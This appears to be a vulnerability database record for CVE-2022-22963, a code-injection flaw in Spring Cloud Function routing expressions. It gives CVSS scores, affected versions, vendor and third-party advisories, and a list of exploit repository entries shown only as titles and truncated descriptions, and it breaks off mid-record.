ID CVE-2022-22963 Type cve Reporter security@vmware.com Modified 2022-04-20T00:16:00
Description
In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
{"id": "CVE-2022-22963", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-22963", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "published": "2022-04-01T23:15:00", "modified": "2022-04-20T00:16:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22963", "reporter": "security@vmware.com", "references": ["https://tanzu.vmware.com/security/cve-2022-22963", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005", "https://www.oracle.com/security-alerts/cpuapr2022.html"], "cvelist": ["CVE-2022-22963"], "immutableFields": [], "lastseen": "2022-04-20T05:55:31", "viewCount": 258, "enchantments": {"twitter": {"counter": 2, "tweets": [{"link": "https://twitter.com/Alra3ees/status/1525827005564039171", "text": "SpringScan Burp detection plugin:-\n\nSupport for detecting vulnerabilities:-\n Spring Core RCE (CVE-2022-22965)\n Spring Cloud Function SpEL RCE (CVE-2022-22963)\n Spring Cloud GateWay SPEL RCE (CVE-2022-22947)\n\nhttps://t.co/gDhXH19mpB", "author": "Alra3ees", "author_photo": "https://pbs.twimg.com/profile_images/830874453680680962/BexDw2YA_400x400.jpg"}]}, "vulnersScore": "PENDING"}, "_state": {"twitter": 1652623204}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:vmware:spring_cloud_function:3.2.2", "cpe:/a:vmware:spring_cloud_function:3.1.6"], "cpe23": ["cpe:2.3:a:vmware:spring_cloud_function:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_cloud_function:3.2.2:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "affectedSoftware": [{"cpeName": "vmware:spring_cloud_function", "version": "3.1.6", "operator": "le", "name": "vmware spring cloud function"}, {"cpeName": "vmware:spring_cloud_function", "version": "3.2.2", "operator": "le", "name": "vmware spring cloud function"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:vmware:spring_cloud_function:3.1.6:*:*:*:*:*:*:*", "versionEndIncluding": "3.1.6", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:vmware:spring_cloud_function:3.2.2:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndIncluding": "3.2.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://tanzu.vmware.com/security/cve-2022-22963", "name": "https://tanzu.vmware.com/security/cve-2022-22963", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "name": "20220401 Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022", "refsource": "CISCO", "tags": ["Third Party Advisory"]}, {"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005", "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005", "refsource": "CONFIRM", "tags": ["Third Party Advisory"]}, {"url": "https://www.oracle.com/security-alerts/cpuapr2022.html", "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "tags": []}]}
{"checkpoint_advisories": [{"lastseen": "2022-04-07T03:29:32", "description": "A remote code execution vulnerability exists in Spring Cloud Function. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Cloud Function Remote Code Execution (CVE-2022-22963)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "CPAI-2022-0096", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-05-03T17:58:48", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "github", "title": "Code Injection in Spring Cloud Function", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-03T17:41:55", "id": "GHSA-6V73-FGF6-W5J7", "href": "https://github.com/advisories/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-12T00:09:54", "description": "spring-cloud-function-context is vulnerable to remote code execution. The routing functionality allows a user to provide a malicious SpEL as a routing-expression which would allow arbitrary OS commands to be executed remotely.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:51:42", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-20T05:51:00", "id": "VERACODE:34884", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34884/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "We have released Spring Cloud Function [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) & [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) to address the following CVE report.\n\n * [CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://tanzu.vmware.com/security/cve-2022-22963>)\n\nPlease review the information in the CVE report and upgrade immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T00:53:00", "type": "spring", "title": "CVE report published for Spring Cloud Function", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-30T00:53:00", "id": "SPRING:5D790268422545C1CFB6959B07261E50", "href": "https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-11T17:49:11", "description": "# SpringCloudFunction-Research\nCVE-2022-22963 research\n\n# \u74b0\u5883\n* v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T17:06:55", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-07T10:59:37", "id": "2EBB728F-8FCC-57DB-8AC5-50BB5C51500E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-18T22:28:40", "description": "# CVE-2022-22963\nCVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_\u6f0f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T11:36:42", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-18T18:49:05", "id": "D71757FD-E7A3-525B-8B2B-FB1D6DC37D11", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-06T01:33:34", "description": "# Spring Cloud Function Vulnerability(CVE-2022-22963)\n\nVulnerabl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:32:14", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-06T01:29:18", "id": "BD7F2851-5090-5010-8C27-4B3CCF48ADE1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:27", "description": "# Spring Cloud Function SpEL - cve-2022-22963\n## Build\n```bash\n$...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T06:45:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-03T07:36:26", "id": "8D79D09C-1FB6-5C99-89C0-D839A4817791", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:50:05", "description": "# CVE-2022-22963 RCE PoC\n\nMinimal example to reproduce CVE-2022-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T17:37:35", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-07T15:01:56", "id": "723B41AF-E5A8-5571-BA74-FA8924B88606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-13T08:14:17", "description": "# Spring Core RCE\nA Proof-of-Concept (**PoC**) of the **Spring C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:29:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-13T06:46:21", "id": "19D93D49-F907-5A3B-9FA2-ED9EFE3A45E0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-14T19:27:06", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T05:04:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-14T12:20:44", "id": "82AB8274-DF0B-58B4-8C3C-3CE19E21A0C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T03:11:46", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:14:46", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:22:08", "id": "AD1045B7-6DFA-557C-81B2-18F96F0F68A2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:50:00", "description": "# Spring Core RCE - CVE-2022-22963\n\n> Following Spring Cloud, on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T19:07:35", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T05:38:27", "id": "3D40E0AE-D155-5852-986D-A5FF3880E230", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:16:05", "description": "# CVE-2022-22963\nTo run the vulnerable SpringBoot application ru...", "cvss3": {}, "published": "2022-03-30T15:49:32", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T08:56:16", "id": "F340F3AE-7288-5EF0-85A3-DAB6576064D5", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-28T04:18:46", "description": "# Spring Cloud Function SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-22963\uff09\r\n\r\n>Spring\u6846\u67b6...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T11:10:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-28T02:01:35", "id": "3389F104-810F-5B22-8F78-C961A94A8C27", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-01T02:33:23", "description": "# springhound\nCreated after the release of CVE-2022-22965 a...", "cvss3": {}, "published": "2022-04-01T00:34:29", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:47:30", "id": "D30073F4-9BB7-54D9-A5F6-DCCA5A005D4D", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-04T23:38:35", "description": "# CVE-2022-22965 aka \"Spring4Shell\"\n> Vulnerabilidad RCE en Spri...", "cvss3": {}, "published": "2022-03-31T16:14:36", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T02:03:07", "id": "75235F83-D7F4-570F-B966-72159CCBA5CB", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-03T13:20:46", "description": "# Spring CVE\nThis includes CVE-2022-22963, a Spring SpEL / Expre...", "cvss3": {}, "published": "2022-03-31T20:19:51", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T07:36:29", "id": "6E5C078B-B2FA-520B-964A-D7055FD4EB0A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-03-23T21:28:22", "description": "# CVE-2022-XXXX\n\n abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has remote code execution vulnerability. An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 